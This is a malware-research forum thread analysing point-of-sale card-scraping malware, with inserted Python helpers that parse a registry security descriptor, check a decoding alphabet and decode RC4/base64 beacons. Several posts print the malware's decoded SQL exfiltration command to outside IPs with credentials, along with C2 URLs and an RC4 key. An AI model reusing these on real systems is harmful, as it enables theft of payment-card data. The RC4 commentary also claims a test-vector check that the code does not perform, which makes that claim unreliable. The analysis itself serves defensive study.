Point-of-Sale malwares / RAM scrapers
-
- Posts: 501
- Joined: Thu Apr 12, 2012 4:53 pm
Re: Point-of-Sale malwares / RAM scrapers
It was written on January 27th.. Why did no one tell me this?
I feel so darn stupid to realize that only I didn't know anything about the previous details..
I spent a lot of my time researching for nothing..
Re: Point-of-Sale malwares / RAM scrapers
You're funny 
Any idea about encryption after reading that post?
-
- Posts: 501
- Joined: Thu Apr 12, 2012 4:53 pm
Re: Point-of-Sale malwares / RAM scrapers
exitthematrix wrote:
Any idea about encryption after reading that post?
This key in the registry below may help:
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Retalix\Security, or
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Retalix\Security
Code: Select all
Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
Since we cannot get the traffic in all tries,
the only way left is to reverse this sample the way he did to get the so-called "weird strings".
See below, quoted from the post:
"And the most epic stuff, I found a weird string used by another crappy function after nopping to see what happened if the malware found something in RAM:"
Maybe it "sounds" like that.. I would be happy to see those "weird strings" values, or just paste the Rx values
(wasn't that difficult and not a risky task to share anyway... and he didn't).
"which decodes in:"
Oh, F(word) me! "What" is to be decoded with "what" to burp this result??
If I may suggest, please contact the writer and ask him for either the traffic data, the memory register or that "weird strings" data,
because I won't spend more of my time on this with such scattered details/info..
So many serious high-risk infectors out there which need to be nailed too.. rather than this empty cleaned-up server..
Re: Point-of-Sale malwares / RAM scrapers
@unixfreakjp: first, I think the "Security" key you found won't help to decode data because it's just Windows service manager crap (the malware creates its service if not installed, and then launches the service with the command found above).
Then, for the ugly string I found, it doesn't seem to be an encoded string, but just a list of characters which are taken to build the connection command (where the SQL server credentials are stored).
Btw, if you don't want to load the malware with OllyDbg, you can use IDA to have a global
view of the malware and locate the interesting RunPE (I'll send the ugly string tomorrow, I'm on my smartphone here).
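To check the point made in the reply above about the Retalix "Security" value, here is an added example (not code from the thread, the blog or the sample) that parses the hex pasted earlier as a self-relative Windows SECURITY_DESCRIPTOR, the structure the Service Control Manager stores under Services\<name>\Security. The pasted value is cut off after "0F 0", so the parser stops at the end of the data rather than guessing the rest. Assumed: the standard Windows layouts for SECURITY_DESCRIPTOR, ACL, ACE and SID, and the usual names for the well-known SIDs.

```python
"""Parse the Retalix service "Security" value posted in this thread.

Added example, not code from the thread or from the malware author. It
checks the claim that the value is the Service Control Manager's security
descriptor (a self-relative SECURITY_DESCRIPTOR), not key material. The
post is cut off after "0F 0", so parsing stops wherever the data ends.
"""
import struct

# Hex exactly as posted (truncated after "0F 0").
SECURITY_HEX = (
    "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 "
    "01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 "
    "02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 "
    "12 00 00 00 00 00 18 00 FF 01 0F 0"
)

# SECURITY_DESCRIPTOR_CONTROL bits relevant here.
SE_DACL_PRESENT, SE_SACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x0010, 0x8000
ACE_TYPES = {0: "ACCESS_ALLOWED", 1: "ACCESS_DENIED", 2: "SYSTEM_AUDIT"}
SERVICE_ALL_ACCESS = 0x000F01FF
WELL_KNOWN_SIDS = {"S-1-1-0": "Everyone", "S-1-5-18": "LocalSystem",
                   "S-1-5-32-544": "Administrators"}


def hex_to_bytes(text):
    """Decode the pasted hex; the trailing lone nibble (truncation) is dropped."""
    return bytes.fromhex("".join(t for t in text.split() if len(t) == 2))


def parse_sid(buf, off):
    """Binary SID -> 'S-R-A-s1-s2...' string."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, authority, "".join("-%d" % s for s in subs))


def parse_acl(buf, off):
    """ACL header plus its ACEs; a cut-off ACE yields {'truncated': True}."""
    rev, _sbz1, size, count, _sbz2 = struct.unpack_from("<BBHHH", buf, off)
    aces, pos = [], off + 8
    for _ in range(count):
        if pos + 8 > len(buf):            # not even ACE header + mask left
            aces.append({"truncated": True})
            break
        atype, flags, asize = struct.unpack_from("<BBH", buf, pos)
        if asize < 8 or pos + asize > len(buf):   # ACE body runs past the data
            aces.append({"truncated": True})
            break
        mask = struct.unpack_from("<I", buf, pos + 4)[0]
        sid = parse_sid(buf, pos + 8)
        aces.append({"type": ACE_TYPES.get(atype, atype), "flags": flags,
                     "mask": mask, "sid": sid,
                     "who": WELL_KNOWN_SIDS.get(sid, "?")})
        pos += asize
    return {"revision": rev, "size": size, "count": count, "aces": aces}


def parse_security_descriptor(buf):
    """Self-relative SECURITY_DESCRIPTOR header, then its SACL and DACL."""
    rev, _sbz, control, owner, group, sacl, dacl = struct.unpack_from("<BBHIIII", buf, 0)
    sd = {"revision": rev, "control": control,
          "self_relative": bool(control & SE_SELF_RELATIVE),
          "owner_offset": owner, "group_offset": group, "sacl": None, "dacl": None}
    if control & SE_SACL_PRESENT and sacl:
        sd["sacl"] = parse_acl(buf, sacl)
    if control & SE_DACL_PRESENT and dacl:
        sd["dacl"] = parse_acl(buf, dacl)
    return sd


if __name__ == "__main__":
    buf = hex_to_bytes(SECURITY_HEX)
    sd = parse_security_descriptor(buf)
    print("control=%#06x self_relative=%s" % (sd["control"], sd["self_relative"]))
    print("owner@%#x group@%#x (both past the %d bytes posted)"
          % (sd["owner_offset"], sd["group_offset"], len(buf)))
    for name in ("sacl", "dacl"):
        print(name.upper(), "declares", sd[name]["count"], "ACE(s):")
        for ace in sd[name]["aces"]:
            print("  ", ace)
```

Run as is, it reports a SACL with one audit ACE for Everyone (S-1-1-0) carrying mask 0xF01FF (SERVICE_ALL_ACCESS) and a DACL declaring four ACEs, the first granting LocalSystem (S-1-5-18) mask 0x201FD; the second ACE is cut off by the truncation, and the owner and group SIDs sit beyond the posted bytes. That is the shape of a Service Control Manager security descriptor for a service, exactly what the reply above says, and there is nothing in it that could act as a key.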
Re: Point-of-Sale malwares / RAM scrapers
Btw, I saw unixfreakjp's comment on my blog, so I'll answer the two questions asked (I have to create another post since I can't edit my previous post):
1. What was the "weird string" you talk about?
The string I found was (used by the decrypt function at 004019F0 in TcpAdaptorService1.exe):
Code: Select all
BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF
2. With "what" did you decode that "weird string" into that SQL inject command?
I decoded the function by stepping into the function I showed (at 004019F0), that's all. This function simply does bit permutation, it's not really a crypto function.
And sorry for the details, I was a bit lazy when I wrote the article
(and there is nothing to explain, just follow the code with OllyDbg).
Btw the sample "mmon.exe" helped me to understand what happened too (it's a debug version of the malware which doesn't include all the service managing crap).
-
- Posts: 501
- Joined: Thu Apr 12, 2012 4:53 pm
Re: Point-of-Sale malwares / RAM scrapers
Hi. Thanks for the kind explanation. I debugged and found the same result.

Viewing the string, I found that you're right: the registry key wasn't for this (tried to brute-force with the registry keys through many encryption methods & didn't come to a reasonable result either).
The permutation mentioned is bit operations, which gave me a headache following this in my CUI. I'll install IDA to follow this further.
PS: I'm so sorry that you had to re-write the blog post. That was not my intention.
- EP_X0FF
- Global Moderator
- Posts: 4872
- Joined: Sun Mar 07, 2010 5:35 am
- Location: Russian Federation
- Contact:
Re: Point-of-Sale malwares / RAM scrapers
unixfreaxjp wrote:
Viewing the string, I found that you're right: the registry key wasn't for this (tried to brute-force with the registry keys through many encryption methods & didn't come to a reasonable result either).
The permutation mentioned is bit operations, which gave me a headache following this in my CUI. I'll install IDA to follow this further.
Simple and primitive swapping. There are a few "encrypted" strings inside.
First
Code: Select all
"',27h,'4 d3rI-s8UTP9pecvaCwt,1;.BhfLSli2F(%)DQuNREO6MWmb0=k7oA!
Code: Select all
svchosts -S FS1 -U sa -P -Q "INSERT INTO OЃENэOWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.166.178.209,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'"
OЃENэOWSET should be OPENROWSET. Also notice FS1, which should be MFS1, but the first symbol for me is trashed (actual value 0x5).
Didn't dig too much, as it's boring.
Second
Code: Select all
BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF
Code: Select all
svchosts.exe -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.108.132.18,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'
Ring0 - the source of inspiration
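The two table/command pairs in the post above can be checked mechanically. The following is an added example (not code from the thread, the blog or the sample): it strips IDA's ',27h,' rendering of an embedded single quote, verifies that each decoded command uses only characters present in its "weird string", and lists the characters that are not in the table (the mangled OЃENэOWSET). It also shows the table-lookup step of such a decoder in general form; the index streams it feeds in are constructed here for illustration, since the real index data and the bit permutation that produces it are not on the page.

```python
"""Check the 'weird string' / decoded-command pairs from the thread.

Added example, not code from the thread, the blog or the malware. The
explanation given in the thread is that the "weird string" is not
ciphertext but an alphabet: the decoder produces indices (by bit
permutation) and looks each one up in this table to rebuild the command.
If that is right, every character of the decoded command must appear in
the table. Characters that do not are either corruption or evidence that
the wrong table is being used.
"""

# Strings exactly as posted. IDA renders a single quote inside a string
# literal as ',27h,' (27h is ASCII '), so that sequence stands for one quote.
ALPHABET_1 = "\"',27h,'4 d3rI-s8UTP9pecvaCwt,1;.BhfLSli2F(%)DQuNREO6MWmb0=k7oA!"
ALPHABET_2 = "BLC.bdR3S% 1!rA2l\"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF"

CMD_1_AS_POSTED = ('svchosts -S FS1 -U sa -P -Q "INSERT INTO OЃENэOWSET('
                   "'SQLOLEDB','Network=DBMSSOCN;Address=46.166.178.209,443;"
                   "uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'\"")
# The corrections EP_X0FF points out: OPENROWSET and the trashed M of MFS1.
CMD_1_FIXED = (CMD_1_AS_POSTED.replace("OЃENэOWSET", "OPENROWSET")
                               .replace("-S FS1", "-S MFS1"))
CMD_2 = ('svchosts.exe -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('
         "'SQLOLEDB','Network=DBMSSOCN;Address=46.108.132.18,443;"
         "uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'")


def ida_unescape(s):
    """Turn IDA's ',27h,' rendering back into the single quote it encodes."""
    return s.replace("',27h,'", "'")


def table(alphabet):
    """The alphabet as a lookup table: index -> character."""
    return list(ida_unescape(alphabet))


def foreign_chars(alphabet, text):
    """Characters of `text` the table cannot produce."""
    return set(text) - set(table(alphabet))


def covers(alphabet, text):
    """True when the whole of `text` can be built from the table."""
    return not foreign_chars(alphabet, text)


def encode(alphabet, text):
    """Plaintext -> index stream. Illustrative: the real malware derives the
    indices by bit permutation of some stored bytes, which the page does not show."""
    tbl = table(alphabet)
    return [tbl.index(c) for c in text]


def decode(alphabet, indices):
    """Index stream -> plaintext: the table-lookup step of a decoder like this."""
    tbl = table(alphabet)
    return "".join(tbl[i] for i in indices)


def main():
    for name, alphabet, cmd in (("first", ALPHABET_1, CMD_1_AS_POSTED),
                                ("first (fixed)", ALPHABET_1, CMD_1_FIXED),
                                ("second", ALPHABET_2, CMD_2)):
        bad = foreign_chars(alphabet, cmd)
        print("%-14s table=%d chars, command covered: %s%s" % (
            name, len(table(alphabet)), not bad,
            "  rejected: %r" % sorted(bad) if bad else ""))
    idx = encode(ALPHABET_2, CMD_2)   # constructed index stream, for the round trip
    print("first indices:", idx[:8], "-> decode ok:", decode(ALPHABET_2, idx) == CMD_2)


if __name__ == "__main__":
    main()
```

Both tables turn out to hold exactly the distinct characters of their command and nothing else (58 characters for the first pair, 57 for the second, with no repeats), which is what an alphabet built from the command looks like and not what a cipher's key or ciphertext looks like. The only characters the check rejects in the first command are the two mangled ones inside OPENROWSET; the dropped M of MFS1 cannot be caught this way, since M is still a valid table entry.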
- Xylitol
- Global Moderator
- Posts: 1671
- Joined: Sat Apr 10, 2010 5:54 pm
- Location: Seireitei, Soul Society
- Contact:
Re: Point-of-Sale malwares / RAM scrapers
Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46
btw the unknown scraper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now known as Win32/Spy.POSCardStealer.B
and found a POS malware named 'Alina'. I will post more samples later.
Re: Point-of-Sale malwares / RAM scrapers
Xylitol wrote:
Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46
btw the unknown scraper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now known as Win32/Spy.POSCardStealer.B
b3e15a281bb3e1f5ef63841c1801118f6262ac8fb1c8daa45fd99c051011de4b
Sends RC4-encrypted, base64-encoded data to: http://192.168.1.9/FUCKERS/post.php
Is this a work in progress? Test/beta? (192.168.1.9)
Data is RC4 encrypted with the "B0tswanaRul3z" key.
Seems to be a variant of that mm_bot.exe previously posted by you, but more advanced, with more options (or just DEBUG?).
bc7dd5d2fcb072941a2aa9752d0ec8e0933d0ee5406b0d117d9c455083e835d6
Sends POST data to: http://84.22.106.94/panel2asdasd/up.php (data as: act=%s&b=%s&c=%s&v=%s&%s=) every 20 seconds!
The guy seems Romanian, his girlfriend is "Alina"

It's not the same malware.
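For the first sample in the post above, the traffic is described as RC4 under the key "B0tswanaRul3z", then base64. The following is an added example (not code from the thread or from the sample) of what an analyst does with a captured POST body of that kind: base64-decode it, then run RC4 with that key. RC4 is symmetric, so the same routine produces a sample body for the demonstration. The beacon contents below are constructed (the post does not show the real format), and a published RC4 test vector is used to confirm the routine before trusting it on anything else.

```python
"""Decode a beacon of the kind described above: base64 text carrying RC4
ciphertext under the key "B0tswanaRul3z".

Added example, not code from the thread or from the sample. The key and the
"RC4 then base64" layering come from the post; the beacon body is constructed
here by encrypting a made-up line, so the example runs offline.
"""
import base64

KEY = b"B0tswanaRul3z"   # key named in the post


def rc4(key, data):
    """Plain RC4: key scheduling, then XOR the keystream into `data`.
    Works for both directions since RC4 is a stream cipher."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_beacon(plaintext, key=KEY):
    """What the bot would send: RC4, then base64 (per the post)."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def decode_beacon(body, key=KEY):
    """What the analyst does with a captured POST body: base64, then RC4."""
    return rc4(key, base64.b64decode(body))


# Constructed sample, not a real capture: a host tag and one track-1-shaped
# line using the 4111... test PAN, the kind of thing a RAM scraper exfiltrates.
SAMPLE_PLAINTEXT = b"host=POS01\r\n%B4111111111111111^DOE/JOHN^25011010000000000000?\r\n"


def main():
    body = encode_beacon(SAMPLE_PLAINTEXT)
    print("POST body :", body)
    print("decoded   :", decode_beacon(body))
    # Wrong key gives garbage, which is the quick way to tell whether a
    # captured body really uses this key.
    print("wrong key :", decode_beacon(body, b"notthekey")[:16])


if __name__ == "__main__":
    main()
```

The test vector (key "Key", plaintext "Plaintext", ciphertext bbf316e8d940af0ad3) is the standard published one; a decoder that fails it is wrong regardless of what it does with the beacon. Against a real capture, swap SAMPLE_PLAINTEXT out for the raw POST body and look for readable output; if the result is noise, either the key or the layering differs from what the post describes.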
- Xylitol
- Global Moderator
- Posts: 1671
- Joined: Sat Apr 10, 2010 5:54 pm
- Location: Seireitei, Soul Society
- Contact:
Re: Point-of-Sale malwares / RAM scrapers
yep exitthematrix, I've seen that.
I have more of these 'Alina', including 1.0, 2.1, 3.2 and 3.3 versions according to strings found inside.
They're attached.
https://www.virustotal.com/file/ee29643 ... 359892457/ > 29/46
https://www.virustotal.com/file/7f907b6 ... 359892458/ > 27/46
https://www.virustotal.com/file/ee29643 ... 359892459/ > 29/46
https://www.virustotal.com/file/7f907b6 ... 359892461/ > 27/46
https://www.virustotal.com/file/45c299b ... 359892462/ > 25/46
https://www.virustotal.com/file/56a8a54 ... 359892463/ > 25/46
https://www.virustotal.com/file/ac0f8a3 ... 359892466/ > 27/46
Some are upx packed.